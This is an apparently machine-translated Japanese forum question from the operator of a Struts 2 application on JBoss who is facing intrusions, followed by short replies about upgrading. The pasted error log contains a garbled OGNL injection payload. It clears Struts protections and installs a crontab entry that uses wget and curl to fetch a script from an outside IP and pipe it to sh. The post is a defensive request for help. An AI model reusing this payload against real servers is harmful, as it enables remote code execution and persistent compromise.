私たちはJ2EE Struts 2アプリケーションを持っています。JBOSS Struts 2アプリケーションの侵入
最近、私たちが見たいくつかの侵入は、ポート80上で動作する我々のアプリケーションに来ているJBossの(バージョン4.2.0)エラーログがこれを与える:
リクエストがマルチパートを含んでいない/フォーム - (#dm = @ ognl.OgnlContext @ DEFAULT_MEMBER_ACCESS)。(#_ memberAccess?(#_ memberAccess =#dm)、データタイプまたはマルチパート/フォームデータストリームです。 (#ognlUtil =#container.getInstance(@ com.opensymphony.xwork2.ognl.OgnlUtil @ class))(#コンテナ=#コンテキスト['com.opensymphony.xwork2.ActionContext.container']) (#cmd = 'echo "15 * * * * wget)#ognlUtil.getExcludedPackageNames()。clear())(#ognlUtil.getExcludedClasses()。clear())(#context.setMemberAccess -O - -q http://91.230.47.41/res/logo.jpg|sh \ n5 0 * * * * curl http://91.230.47.41/res/logo.jpg|sh "| (#iswin?{'cmd(crontab - '))(#iswin =(@ [email protected]( 'os.name')。toLowerCase()。contains( 'win')) (#p = new java.lang.ProcessBuilder(#cmds))。(#cmd):(# (#[email protected]()。getOutputStream()))。(#org.apache.struts2.ServletActionContext @ getResponse()。 [email protected](#1 process.getInputStream()、#のROS))。(#1 ros.flush())}
彼らは、JBossのbinフォルダにいくつかの.exeファイルを注入し、しようとしていますサーバーと同様にアプリケーションを中断します。すでにいくつかのアンチウイルスソフトウェアがインストールされています。しかし、それは止まらない。アプリケーションからそれらを止める方法について考えてみましょう。
いいアイデアが参考になります。
アップグレード以外にも、このリポジトリ - > https://github.com/apache/struts-extrasを確認してください。また、最新のアップグレードでもログにエラーが表示されることがありますが、根本的な問題は修正されています** –
2.3.32バージョンにアップグレードするのは安全ですか?そのためにコードを変更する必要はないからです。私はある方法がある場合マルチパーツファイルのアップロードを無効にすることを考えていた? –